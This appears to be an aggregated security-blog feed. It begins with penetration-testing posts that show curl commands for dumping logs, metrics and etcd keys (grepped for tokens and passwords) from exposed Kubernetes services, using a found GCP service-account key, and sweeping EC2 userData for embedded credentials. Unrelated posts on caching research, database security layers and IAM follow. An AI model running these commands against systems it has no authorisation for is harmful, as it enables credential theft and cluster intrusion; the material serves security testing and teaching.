| 1.2.3.4:30000         | Remote Code   | Dashboard Exposed    | All oprations on the | nodes: pach-okta |
|                       | Execution     |                      | cluster are exposed  |                  |
+-----------------------+---------------+----------------------+----------------------+------------------+

Why do you care?  It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like:
viewing secrets



utilization



logs

shells

Kubernetes: Kubelet API containerLogs endpoint


How to get the info that kube-hunter reports for open /containerLogs endpoint



Vulnerabilities
+---------------+-------------+-------------------+----------------------+----------------+
| LOCATION      | CATEGORY    | VULNERABILITY     | DESCRIPTION          | EVIDENCE       |
+---------------+-------------+-------------------+----------------------+----------------+
| 1.2.3.4:10250 | Information | Exposed Container | Output logs from a   |                |
|               | Disclosure  | Logs              | running container    |                |
|               |             |                   | are using the        |                |
|               |             |                   | exposed              |                |
|               |             |                   | /containerLogs       |                |
|               |             |                   | endpoint             |                |
+---------------+-------------+-------------------+----------------------+----------------+

First step: grab the output from /runningpods/. Example below:
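
Something like this works (the IP is a placeholder; -k skips verification of the kubelet's self-signed cert):

$ curl -sk https://1.2.3.4:10250/runningpods/ | python -mjson.tool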



You'll need the namespace, pod name and container name.

Thus given the below runningpods output:


{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},

turns into:

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana



and

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
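
Hitting those with curl is enough to dump the logs (a sketch; -k again because of the self-signed cert):

$ curl -ks https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana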



The Top 5 Vendor-Neutral Cloud Security Certifications of 2019

Many organizations migrate to the cloud because of increased efficiency, data space, scalability, speed and other benefits. But cloud computing comes with its own security threats. To address these challenges, companies should create a hybrid cloud environment, confirm that their cloud security solution offers 24/7 monitoring and multi-layered defenses as well as implement security measures […]… Read More

The post The Top 5 Vendor-Neutral Cloud Security Certifications of 2019 appeared first on The State of Security.

Kubernetes: Master Post

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If I'm missing blog posts or useful resources, ping me here or on Twitter.

Talks you should watch if you are interested in Kubernetes:


Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman
https://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]


Perfect Storm: Taking the Helm of Kubernetes - Ian Coldwater
https://www.youtube.com/watch?v=1k-GIDXgfLw


A Hacker's Guide to Kubernetes and the Cloud - Rory McCune
Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes
https://www.youtube.com/watch?v=ohTq0no0ZVU


Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/


Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kubelet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kubelet 10250
     - Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
     - Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
     - Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html


Cloud Metadata URLs and Kubernetes


-I'll update as they get posted

Kubernetes: kube-hunter.py etcd


I mentioned a few of the auditing tools that exist in the master post. Kube-hunter is one that is pretty OK. You can use it to quickly scan for multiple Kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE        | LOCATION       |
+-------------+----------------+
| Node/Master | 1.2.3.4        |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION            | DESCRIPTION          |
+---------+---------------------+----------------------+
| Etcd    | 1.2.3.4:2379        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |
+---------+---------------------+----------------------+

Vulnerabilities
+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+

Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

Information disclosure about the metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true
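
For example, with curl and a JSON pretty-printer (the IP is a placeholder; the /api/v2.0/machine endpoint is also worth a look):

$ curl -s "http://1.2.3.4:4194/api/v2.0/spec?recursive=true" | python -mjson.tool
$ curl -s "http://1.2.3.4:4194/api/v2.0/machine" | python -mjson.tool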

Screenshots



Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in English is that etcd stores the current state of the Kubernetes cluster, usually including the Kubernetes tokens and passwords. If you check out the following references, you can get a sense of the pain level that could potentially be involved. At minimum you can get network info or running pods, and at best credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

The second link talks extensively about the types of info they found when they hit all the Shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd, the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true
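
As a concrete sketch (the IP is a placeholder), pretty-print the dump and grep it for anything juicy:

$ curl -s "http://1.2.3.4:2379/v2/keys/?recursive=true" | python -mjson.tool
$ curl -s "http://1.2.3.4:2379/v2/keys/?recursive=true" | grep -iE "token|password|secret"

Note this only covers the etcd v2 keyspace; clusters that store everything via the v3 API won't return data here, and etcdctl is the tool for that.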

Example Loot - 

Usually it's boring stuff like this:



But occasionally you'll get more interesting things like:



or more fun things like kublet tokens:




I found a GCP service account token…now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and I haven't seen too many posts on f**king it up, so I'm going to do at least one :-)

Google has several ways to do authentication, but most likely what you are going to come across, shoved into code somewhere or in a dotfile, is a service account JSON file.

It's going to look similar to this:
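
For reference, a service account key file is a blob of JSON along these lines (all values here are illustrative):

{
  "type": "service_account",
  "project_id": "example-project",
  "private_key_id": "0123456789abcdef...",
  "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n",
  "client_email": "some-svc@example-project.iam.gserviceaccount.com",
  "client_id": "123456789012345678901",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token"
}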

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However, with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly. The issue is that a service account for something like GCP Compute looks the same as one you made to manage your calendar or one of the hundreds of other Google services.

You'll need to install the gcloud tools for your OS. Info here: https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If the key is invalid, you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

You can validate it worked by issuing the gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com


I put together a shell script that runs through a bunch of commands to enumerate information. The only info you need to provide is the project name. This can be found in the JSON file in the project_id field or by issuing the gcloud projects list command. Sometimes there are multiple projects associated with an account, and you'd need to run the shell script for each project.

The first time you run these API calls you might need to pass a "Y" to the CLI to enable the relevant API. You can get around these manual shenanigans by doing a:

yes | ./gcp_enum.sh 

This will answer Yes for you each time :-)
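
A minimal sketch of the kind of enumeration such a script runs, assuming a project named example-project (the exact commands in gcp_enum.sh may differ):

gcloud compute instances list --project example-project
gcloud compute firewall-rules list --project example-project
gcloud container clusters list --project example-project
gcloud iam service-accounts list --project example-project
gcloud sql instances list --project example-project
gsutil ls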






NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite


enjoy

CG

Abine says Blur Password Manager User Information Exposed

Customers who use the Blur secure password manager by Abine may have had sensitive information leaked, according to a statement by Abine, the company that makes the product. 

The post Abine says Blur Password Manager User Information Exposed appeared first on The Security Ledger.


AWS EC2 instance userData

In an effort to get myself blogging again, I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general, I thought instance metadata was only something you could hit from WITHIN the instance via the metadata URL: http://169.254.169.254/latest/meta-data/

However, if you read the link above, there is an option to attach user data at launch time.


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 
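
Side note: from inside the instance itself, that user data is readable without any AWS credentials at all, at least when the old unauthenticated (IMDSv1-style) metadata service is enabled:

curl http://169.254.169.254/latest/user-data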

That's interesting, right?! So if you have some AWS creds, the easiest way to check for this (after you enumerate instance IDs) is with the AWS CLI.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"
    }
}


Anyway, that can get tedious, especially if the org has a ton of things running. This is precisely the reason @cktricky and I built weirdAAL. Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops through all the regions and, for any instances it finds, queries the userData attribute. Hurray for automation.
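
If you just want a rough feel for what that looks like without installing weirdAAL, here's a minimal bash approximation using the AWS CLI (this is not the weirdAAL code, just a sketch):

#!/bin/bash
# Sweep every region, list instance IDs, and dump the decoded userData for each.
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  for id in $(aws ec2 describe-instances --region "$region" \
      --query 'Reservations[].Instances[].InstanceId' --output text); do
    echo "== $region / $id =="
    # pull the base64 userData value and decode it (base64 -d on Linux, -D on macOS)
    aws ec2 describe-instance-attribute --attribute userData --instance-id "$id" \
        --region "$region" --query 'UserData.Value' --output text | base64 -d
    echo
  done
done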

That module is in the current version of weirdAAL. Enjoy.

-CG

Improve Security by Thinking Beyond the Security Realm

It used to be that dairy farmers relied on whatever was growing in the area to feed their cattle. They filled the trough with vegetation grown right on the farm. They probably relied heavily on whatever grasses grew naturally and perhaps added some high-value grains like barley and corn. Today, with better technology and knowledge, dairy farmers work with nutritionists to develop a personalized concentrate of carbohydrates, proteins, fats, minerals, and vitamins that gets added to the natural feed. The result is much healthier cattle and more predictable growth.

We’re going through a similar enlightenment in the security space. To get the best results, we need to fill the trough that our Machine Learning will eat from with high-value data feeds from our existing security products (whatever happens to be growing in the area) but also (and more precisely for this discussion) from beyond what we typically consider security products to be.

In this post to the Oracle Security blog, I make the case that "we shouldn’t limit our security data to what has traditionally been in-scope for security discussions" and how understanding Application Topology (and feeding that knowledge into the security trough) can help reduce risk and improve security.

Click to read the full article: Improve Security by Thinking Beyond the Security Realm

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, whether they are geographically collocated or spread out, and whether they belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforces legal and security constraints, and minimizes overall resource consumption. In such a federation, individual enterprises are able to dynamically scale their cloud services in and out, because they can offer their own spare resources (when available) and take in resources from others when needed. This maximizes each federation member's own infrastructure utilization while minimizing its excess capacity needs.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communication between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsche Telekom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU (SG-LRU) and Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

Figure: fraction of top-k results compared to cache hit rates

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies" and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Access Security Brokers (CASBs) can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.
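
As a trivially small example of the kind of automated check such a tool (or even a scheduled script) can run, here is a sketch that uses the AWS CLI to flag an S3 bucket whose ACL grants access to everyone (BUCKET_NAME is a placeholder):

aws s3api get-bucket-acl --bucket BUCKET_NAME \
    --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']"

This returns an empty list for a properly locked-down bucket; anything else deserves a closer look.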

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with Blackberry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate mobile device use-cases. There's no reason to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate provisioning mobile apps and data rights just as they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. A number of niche vendors have even popped up that provide that as their primary value proposition. But the core technologies behind these stand-alone solutions are nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.).

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up an IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.